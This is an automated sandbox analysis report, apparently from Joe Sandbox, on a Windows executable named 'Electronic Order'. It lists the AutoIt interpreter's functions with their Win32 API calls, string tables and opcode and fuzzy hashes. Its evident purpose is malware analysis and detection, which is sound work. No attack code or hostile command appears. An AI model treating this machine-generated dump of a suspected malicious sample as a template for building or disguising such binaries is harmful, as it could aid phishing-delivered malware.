                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharUpperVisibleWindow
                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                      • API String ID: 4105515805-45149045
                                      • Opcode ID: e49872614786c16c8e209fefdeb0aac173182d734e10b2ab0c0c3e73c289e48c
                                      • Instruction ID: cb8699b13931fca7242574550fb016d41e0c93589da6dee4eadef2e85d34cd71
                                      • Opcode Fuzzy Hash: e49872614786c16c8e209fefdeb0aac173182d734e10b2ab0c0c3e73c289e48c
                                      • Instruction Fuzzy Hash: 39D1A330204205DBCB14EF21D855BAABBA1EF94354F11945CB8867B6A3DB70EE4ACB61
                                      Function 00E4A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTextColor.GDI32(?,00000000), ref: 00E4A89F
                                      • GetSysColorBrush.USER32(0000000F), ref: 00E4A8D0
                                      • GetSysColor.USER32(0000000F), ref: 00E4A8DC
                                      • SetBkColor.GDI32(?,000000FF), ref: 00E4A8F6
                                      • SelectObject.GDI32(?,?), ref: 00E4A905
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00E4A930
                                      • GetSysColor.USER32(00000010), ref: 00E4A938
                                      • CreateSolidBrush.GDI32(00000000), ref: 00E4A93F
                                      • FrameRect.USER32(?,?,00000000), ref: 00E4A94E
                                      • DeleteObject.GDI32(00000000), ref: 00E4A955
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00E4A9A0
                                      • FillRect.USER32(?,?,?), ref: 00E4A9D2
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E4A9FD
                                        • Part of subcall function 00E4AB60: GetSysColor.USER32(00000012), ref: 00E4AB99
                                        • Part of subcall function 00E4AB60: SetTextColor.GDI32(?,?), ref: 00E4AB9D
                                        • Part of subcall function 00E4AB60: GetSysColorBrush.USER32(0000000F), ref: 00E4ABB3
                                        • Part of subcall function 00E4AB60: GetSysColor.USER32(0000000F), ref: 00E4ABBE
                                        • Part of subcall function 00E4AB60: GetSysColor.USER32(00000011), ref: 00E4ABDB
                                        • Part of subcall function 00E4AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E4ABE9
                                        • Part of subcall function 00E4AB60: SelectObject.GDI32(?,00000000), ref: 00E4ABFA
                                        • Part of subcall function 00E4AB60: SetBkColor.GDI32(?,00000000), ref: 00E4AC03
                                        • Part of subcall function 00E4AB60: SelectObject.GDI32(?,?), ref: 00E4AC10
                                        • Part of subcall function 00E4AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00E4AC2F
                                        • Part of subcall function 00E4AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E4AC46
                                        • Part of subcall function 00E4AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00E4AC5B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                      • String ID:
                                      • API String ID: 4124339563-0
                                      • Opcode ID: dbf581e804487ec4c1abcbd31bc8f29a29d504242476f205ce2123f15bed3246
                                      • Instruction ID: f0a16fcf5c3db14a19b1433f90e68d83f86bfc8d447d4db715ed236b47c6ef3f
                                      • Opcode Fuzzy Hash: dbf581e804487ec4c1abcbd31bc8f29a29d504242476f205ce2123f15bed3246
                                      • Instruction Fuzzy Hash: 27A1CE76008301EFD7109F65EC08A6B7BA9FF89731F141A29F962B61E1C734D84ACB52
                                      Function 00E377BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(00000000), ref: 00E377F1
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E378B0
                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E378EE
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E37900
                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E37946
                                      • GetClientRect.USER32(00000000,?), ref: 00E37952
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E37996
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E379A5
                                      • GetStockObject.GDI32(00000011), ref: 00E379B5
                                      • SelectObject.GDI32(00000000,00000000), ref: 00E379B9
                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E379C9
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E379D2
                                      • DeleteDC.GDI32(00000000), ref: 00E379DB
                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E37A07
                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E37A1E
                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E37A59
                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E37A6D
                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E37A7E
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E37AAE
                                      • GetStockObject.GDI32(00000011), ref: 00E37AB9
                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E37AC4
                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E37ACE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                      • API String ID: 2910397461-517079104
                                      • Opcode ID: fd69ed18244d29331ae0f8420e7078492e1f3901441738bf6603b9d100f9c03c
                                      • Instruction ID: 4e0cf113a89b5c580e9b586a1a0cb599badb066897dcfa64e5dd99d526c46cdf
                                      • Opcode Fuzzy Hash: fd69ed18244d29331ae0f8420e7078492e1f3901441738bf6603b9d100f9c03c
                                      • Instruction Fuzzy Hash: 61A181B1A40215BFEB14DBA5DC4AFAEBBB9EB49710F004154FA14B72E0C774AD05CB60
                                      Function 00E2AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00E2AF89
                                      • GetDriveTypeW.KERNEL32(?,00E4FAC0,?,\\.\,00E4F910), ref: 00E2B066
                                      • SetErrorMode.KERNEL32(00000000,00E4FAC0,?,\\.\,00E4F910), ref: 00E2B1C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                      • API String ID: 2907320926-4222207086
                                      • Opcode ID: 193b6704c2b087f549515ba863babd79813dc73942419048cb024a05fcc09e4d
                                      • Instruction ID: bbe82f2cd2de1c8eea345d9f7f7489ce20770a544abfa0475c618174926c76d8
                                      • Opcode Fuzzy Hash: 193b6704c2b087f549515ba863babd79813dc73942419048cb024a05fcc09e4d
                                      • Instruction Fuzzy Hash: B151E430681716EB8B04DB10E9A2DBD73B1FF94745728B02AF40AB7290C734AD51DB52
                                      Function 00DC6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 1038674560-86951937
                                      • Opcode ID: 4d971c130ffe668c7fa16bd220cf6a0d78592ba96bee8c1b8d1b9c1d9f5abca7
                                      • Instruction ID: f395bf6f64f411be6ac04aaa284e0dbd4877d7c657ba6475198e2ce5079e9d84
                                      • Opcode Fuzzy Hash: 4d971c130ffe668c7fa16bd220cf6a0d78592ba96bee8c1b8d1b9c1d9f5abca7
                                      • Instruction Fuzzy Hash: FF81EA70640356AACB20BF61DC93FBE7759EF15700F088029FE45AB196EB70DA85C671
                                      Function 00E4AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 00E4AB99
                                      • SetTextColor.GDI32(?,?), ref: 00E4AB9D
                                      • GetSysColorBrush.USER32(0000000F), ref: 00E4ABB3
                                      • GetSysColor.USER32(0000000F), ref: 00E4ABBE
                                      • CreateSolidBrush.GDI32(?), ref: 00E4ABC3
                                      • GetSysColor.USER32(00000011), ref: 00E4ABDB
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E4ABE9
                                      • SelectObject.GDI32(?,00000000), ref: 00E4ABFA
                                      • SetBkColor.GDI32(?,00000000), ref: 00E4AC03
                                      • SelectObject.GDI32(?,?), ref: 00E4AC10
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00E4AC2F
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E4AC46
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00E4AC5B
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E4ACA7
                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E4ACCE
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00E4ACEC
                                      • DrawFocusRect.USER32(?,?), ref: 00E4ACF7
                                      • GetSysColor.USER32(00000011), ref: 00E4AD05
                                      • SetTextColor.GDI32(?,00000000), ref: 00E4AD0D
                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E4AD21
                                      • SelectObject.GDI32(?,00E4A869), ref: 00E4AD38
                                      • DeleteObject.GDI32(?), ref: 00E4AD43
                                      • SelectObject.GDI32(?,?), ref: 00E4AD49
                                      • DeleteObject.GDI32(?), ref: 00E4AD4E
                                      • SetTextColor.GDI32(?,?), ref: 00E4AD54
                                      • SetBkColor.GDI32(?,?), ref: 00E4AD5E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1996641542-0
                                      • Opcode ID: 8913d2c387aaafe79e7e8f6fc49e5b89cf6a04be5158fc0c88273357e8fb4bba
                                      • Instruction ID: 9015afd13046f6ddbe28865694a304180e2270aada4b41ce96807ae3064d0302
                                      • Opcode Fuzzy Hash: 8913d2c387aaafe79e7e8f6fc49e5b89cf6a04be5158fc0c88273357e8fb4bba
                                      • Instruction Fuzzy Hash: 59619B75900208EFDF109FA9EC48EAEBBB9EB09720F158125F911BB2A1D6759D41CF90
                                      Function 00E48C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E48D34
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E48D45
                                      • CharNextW.USER32(0000014E), ref: 00E48D74
                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E48DB5
                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E48DCB
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E48DDC
                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E48DF9
                                      • SetWindowTextW.USER32(?,0000014E), ref: 00E48E45
                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E48E5B
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E48E8C
                                      • _memset.LIBCMT ref: 00E48EB1
                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E48EFA
                                      • _memset.LIBCMT ref: 00E48F59
                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E48F83
                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E48FDB
                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00E49088
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E490AA
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E490F4
                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E49121
                                      • DrawMenuBar.USER32(?), ref: 00E49130
                                      • SetWindowTextW.USER32(?,0000014E), ref: 00E49158
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                      • String ID: 0
                                      • API String ID: 1073566785-4108050209
                                      • Opcode ID: 8000dc808c6414504686c5309474a0470ce0ca243484fe9b6baf8dd8e084adbd
                                      • Instruction ID: 3c6e252e5496fc9b7152a0defb5e947b7eb0fdd758b193e4bfa8608a17a36c03
                                      • Opcode Fuzzy Hash: 8000dc808c6414504686c5309474a0470ce0ca243484fe9b6baf8dd8e084adbd
                                      • Instruction Fuzzy Hash: F3E1B174901209AFDF209F61DC88EEF7BB9EF05714F009196F919BA291DB708A85DF60
                                      Function 00E44B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00E44C51
                                      • GetDesktopWindow.USER32 ref: 00E44C66
                                      • GetWindowRect.USER32(00000000), ref: 00E44C6D
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E44CCF
                                      • DestroyWindow.USER32(?), ref: 00E44CFB
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E44D24
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E44D42
                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E44D68
                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00E44D7D
                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E44D90
                                      • IsWindowVisible.USER32(?), ref: 00E44DB0
                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E44DCB
                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E44DDF
                                      • GetWindowRect.USER32(?,?), ref: 00E44DF7
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00E44E1D
                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00E44E37
                                      • CopyRect.USER32(?,?), ref: 00E44E4E
                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00E44EB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                      • String ID: ($0$tooltips_class32
                                      • API String ID: 698492251-4156429822
                                      • Opcode ID: 470428090162b953d2dddf38b41e47d4469ad03c2a1280f795179f32cebf2803
                                      • Instruction ID: 14b2a705adf7ceb9debad6ca6f8724a92ce87322b0576c186a811d2d6049e3ed
                                      • Opcode Fuzzy Hash: 470428090162b953d2dddf38b41e47d4469ad03c2a1280f795179f32cebf2803
                                      • Instruction Fuzzy Hash: 7EB18BB1604341AFDB04DF25D889B5ABBE4FF84714F00891CF599AB2A1DB70EC05CBA1
                                      Function 00E246D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E246E8
                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E2470E
                                      • _wcscpy.LIBCMT ref: 00E2473C
                                      • _wcscmp.LIBCMT ref: 00E24747
                                      • _wcscat.LIBCMT ref: 00E2475D
                                      • _wcsstr.LIBCMT ref: 00E24768
                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E24784
                                      • _wcscat.LIBCMT ref: 00E247CD
                                      • _wcscat.LIBCMT ref: 00E247D4
                                      • _wcsncpy.LIBCMT ref: 00E247FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 699586101-1459072770
                                      • Opcode ID: 53ecdaa126c5f550aa1b28e9741b13220cf89768404e9d64135b172b78f258dc
                                      • Instruction ID: c6e88d196a4dbaaf0536f086388462ce850ea05493fe741af2b39e561413dbe3
                                      • Opcode Fuzzy Hash: 53ecdaa126c5f550aa1b28e9741b13220cf89768404e9d64135b172b78f258dc
                                      • Instruction Fuzzy Hash: 8A414776A003907BEB14BB729C47EBF77ACDF42710F04016AF905F6182EB74AA0196B5
                                      Function 00DC27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DC28BC
                                      • GetSystemMetrics.USER32(00000007), ref: 00DC28C4
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DC28EF
                                      • GetSystemMetrics.USER32(00000008), ref: 00DC28F7
                                      • GetSystemMetrics.USER32(00000004), ref: 00DC291C
                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DC2939
                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00DC2949
                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DC297C
                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DC2990
                                      • GetClientRect.USER32(00000000,000000FF), ref: 00DC29AE
                                      • GetStockObject.GDI32(00000011), ref: 00DC29CA
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC29D5
                                        • Part of subcall function 00DC2344: GetCursorPos.USER32(?), ref: 00DC2357
                                        • Part of subcall function 00DC2344: ScreenToClient.USER32(00E867B0,?), ref: 00DC2374
                                        • Part of subcall function 00DC2344: GetAsyncKeyState.USER32(00000001), ref: 00DC2399
                                        • Part of subcall function 00DC2344: GetAsyncKeyState.USER32(00000002), ref: 00DC23A7
                                      • SetTimer.USER32(00000000,00000000,00000028,00DC1256), ref: 00DC29FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                      • String ID: AutoIt v3 GUI
                                      • API String ID: 1458621304-248962490
                                      • Opcode ID: 67dfb1a1a739862f5633bdde5776f86edcfd40441c55d251f3065260afeef854
                                      • Instruction ID: 0968caa8192a9c5f4ea39387656bc4200c09da91461d8e236e6fd5977c3731ae
                                      • Opcode Fuzzy Hash: 67dfb1a1a739862f5633bdde5776f86edcfd40441c55d251f3065260afeef854
                                      • Instruction Fuzzy Hash: 63B16A75A0020AAFDB14DFA9DD45FAE7BB4FB08710F118129FA19E7290CB74E851CB60
                                      Function 00E44069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00E440F6
                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E441B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                      • API String ID: 3974292440-719923060
                                      • Opcode ID: a276297ab4e03a53b3b840244ac06c9d885e8c8d8019b3c2ff91d6e3398f81a3
                                      • Instruction ID: 8b5d6f6af0121593184476b6cd9f1926830e395de07353634c67b4d36fae616e
